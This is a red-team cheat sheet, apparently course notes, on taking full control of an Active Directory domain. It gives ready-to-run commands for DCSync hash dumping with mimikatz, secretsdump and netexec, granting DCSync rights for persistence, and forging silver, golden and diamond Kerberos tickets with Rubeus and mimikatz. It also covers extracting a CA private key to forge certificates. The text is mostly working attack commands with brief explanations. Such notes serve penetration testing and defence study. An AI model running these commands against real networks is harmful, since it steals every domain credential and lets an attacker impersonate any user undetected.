Domain Dominance

1. DCSync

! This requires GetNCChanges which is usually only available to domain admins

DCSync is a technique used by attackers to obtain sensitive information, including password hashes, from a domain controller in an Active Directory environment. Any member of Administrators, Domain Admins, or Enterprise Admins as well as Domain Controller computer accounts are able to run DCSync to pull password data.

The DCSync permission implies having these permissions over the domain itself: DS-Replication-Get-Changes, Replicating Directory Changes All and Replicating Directory Changes In Filtered Set.

By default only Domain Admins, Enterprise Admins, Administrators, and Domain Controllers groups have the required privileges.

We can check who has these permissions using powerview.

- DCSycn w/ Mimikatz

To DCSync only one user

.\mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:{domain} /user:krbtgt

.\mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:{domain} /user:administrator /csv" "exit"

To DCSync all users of the domain

.\mimikatz "lsadump::dcsync /domain:{domain} /all /csv" "exit"

- DCSycn w/ Secretsdump from Impacket

impacket-secretsdump {Domain_Name}/{Username}:{Password}@{IP}

impacket-secretsdump {Domain_Name}/{Username}@{IP} -hashes ':{NTLMHash}'

- DCSycn w/ Crackmapexec

netexec smb 10.10.10.10 -u 'username' -p 'password' --ntds

netexec smb 10.10.10.10 -u 'username' -p 'password' --ntds --users

netexec smb 10.10.10.10 -u 'username' -p 'password' --ntds --users --enabled

netexec smb 10.10.10.10 -u 'username' -p 'password' --ntds vss

- Persisntence

If you are a domain admin, you can grant this permissions to any user with the help of powerview:

Add-ObjectAcl -TargetDistinguishedName "dc=example,dc=domain,dc=com" -PrincipalSamAccountName username -Rights DCSync -Verbose

To check

Get-ObjectAcl -DistinguishedName "dc=example,dc=domain,dc=com" -ResolveGUIDs | ?{$_.IdentityReference -match "username"}

2. Silver Tickets

In a silver ticket attack, the attacker creates a forged Kerberos ticket, which they can then use to authenticate themselves as a user and access the resources and systems that the user is authorized to access. You may forge a TGS for any user to any service on that machine, which is useful for short/medium-term persistence.

C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe silver /service:{service, for example: cifs/{machine}.{domain}} /aes256:{dumped aes256} /user:{target user} /domain:{domain name} /sid:{SID (whoami)} /nowrap

Then import the ticket (PtT).

3. Golden Tickets

A "golden ticket" is a forged TGT, signed by the domain's krbtgt account. Where a silver ticket can be used to impersonate any user, it's limited to either that single service or to any service but on a single machine. A golden ticket can be used to impersonate any user, to any service, on any machine in the domain. Credentials are never changed automatically. For that reason, the krbtgt NTLM/AES hash is probably the single most powerful secret you can obtain (and is why you see it used in dcsync examples so frequently).

- With Mimikatz

privilege::debug

lsadump::lsa /inject /name:krbtgt

lsadump::lsa /patch

lsadump::trust /patch

lsadump::dcsync /user:krbtgt

Then we need to take the krbtg hash, locate the domain SID (PowerView) and restart mimikatz:

privilege::debug

kerberos::purge

kerberos::golden /user:fakeuser /domain:{domain name} /sid:{domain SID} /rc4:{krbtg hash} /ptt

Alternatively we can use ticketer.

Then to use the ticket in Linux:

misc::convert ccache ticket.kirbi

export KRB5CCNAME=/home/user/ticket.ccache

cat $KRB5CCNAME

Then to connect:

./psexec.py -k -no-pass -dc-ip {ip} {domain}/administrator@{ip}

To swap ticket between Windows and Linux:

ticket_converter.py velociraptor.ccache velociraptor.kirbi

ticket_converter.py velociraptor.kirbi velociraptor.ccache

- With Rubeus

Once we have krbtgt hash (for example from a dcsync); To locate the domain sid go to PowerView:

C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe golden /aes256:{krbtg aes256 hash} /user:{target user} /domain:{domain} /sid:{domain} /nowrap

Then we can PtT.

4. Diamond Tickets

Like a golden ticket, a diamond ticket is a TGT which can be used to access any service as any user. A golden ticket is forged completely offline, encrypted with the krbtgt hash of that domain, and then passed into a logon session for use. Because domain controllers don't track TGTs it (or they) have legitimately issued, they will happily accept TGTs that are encrypted with its own krbtgt hash.

Therefore, a possible tactic to detect the use of golden tickets is to look for TGS-REQs that have no corresponding AS-REQ. A "diamond ticket" is made by modifying the fields of a legitimate TGT that was issued by a DC. This is achieved by requesting a TGT, decrypting it with the domain's krbtgt hash, modifying the desired fields of the ticket, then re-encrypting it. This overcomes the aforementioned shortcoming of a golden ticket because any TGS-REQs will have a preceding AS-REQ.

First, we prove we have no access to the DC. Example:

ls \\dc-2.dev.cyberbotic.io\c$

Then, we create it with Rubeus (To locate the RID go to PowerView):

execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe diamond /tgtdeleg /ticketuser:{username of the user to impersonate (domain admin)} /ticketuserid:{domain RID of that user} /groups:512 /krbkey:{krbtgt AES256 hash} /nowrap

Rubeus describe will now show that this is a TGT for the target user:

C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe describe /ticket:{ticket}

Then with that ticket we can PtT.

5. Forged Certificates

Gaining local admin access to a CA allows an attacker to extract the CA private key, which can be used to sign a forged certificate. The default validity period for a CA private key is 5 years, but this can be set to any value during setup, sometimes as high as 10+ years.

Once on a CA, SharpDPAPI (https://github.com/GhostPack/SharpDPAPI) can extract the private keys:

execute-assembly C:\Tools\SharpDPAPI\SharpDPAPI\bin\Release\SharpDPAPI.exe certificates /machine

Then we need to save the private key and certificate to a .pem file and convert it to a .pfx with openssl (Procedure in Certificate Services/Misconfigured Certificate Templates).

Then, build the forged certificate with ForgeCert (https://github.com/GhostPack/ForgeCert). Example:

C:\Tools\ForgeCert\ForgeCert\bin\Release\ForgeCert.exe --CaCertPath .\Desktop\sub-ca.pfx --CaCertPassword pass123 --Subject "CN=User" --SubjectAltName "nlamb@cyberbotic.io" --NewCertPath .\Desktop\fake.pfx --NewCertPassword pass123

Even though you can specify any SubjectAltName, the user does need to be present in AD. We can now use Rubeus to request a legitimate TGT with this forged certificate:

execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:nlamb /domain:dev.cyberbotic.io /enctype:aes256 /certificate:MIACAQ[...snip...]IEAAAA /password:pass123 /nowrap

Then we can do PtT. We can combine this with the S4U2self trick to gain access to any machine or service in the domain.

Last updated